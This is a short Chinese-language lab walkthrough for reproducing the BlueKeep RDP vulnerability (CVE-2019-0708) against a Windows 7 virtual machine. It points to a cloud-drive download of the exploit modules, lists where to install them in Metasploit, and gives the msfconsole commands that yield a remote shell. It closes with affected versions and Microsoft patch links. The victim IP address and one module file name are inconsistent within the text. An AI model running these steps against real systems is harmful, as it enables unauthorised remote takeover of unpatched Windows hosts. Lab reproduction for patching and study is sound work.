环境
kali 192.168.1.10
安装msf cve_2019_0708 exp,下载地址
链接:https://pan.baidu.com/s/1_A8AtsEalYt6q85cd5cdRw 密码:7zk6
下载exp,添加到kali自带到msf中,msf首先要升级到v5以上
升级命令 apt install metasploit-framework
网盘中共4个文件,分别放入msf目录中,msf目录根据自己安装到目录来,kali自带默认安装地址为/usr/share
rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/r
dp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/r
dp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_cve.rb --> /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_
bluekeep_rce.rb
msfconsole --> reload_all
win7 192.168.1.13 被攻击机,开启远程桌面,关闭防火墙
利用
msf5 > search 0708
msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 > set rhosts 192.168.1.11
因为win7用的是virtualbox,在target时要根据自己的虚拟环境进行选择
msf5 > set target 2
msf5 > run
shell
python 获取远程cmd
影响范围
Windows 7
Windows 2003
Windows Server 2008 R2
Windows Server 2008
Windows XP
修复方法
Microsoft官方已经在 2019年5月14日修复了该漏洞,用户可以通过安装微软的安全更新来给系统打上安全补丁,下载地址为:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
以及为已不受微软更新支持的系统(Windows Server 2003和Windows XP)提供的安全更新,下载地址:
https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708
参考链接:https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83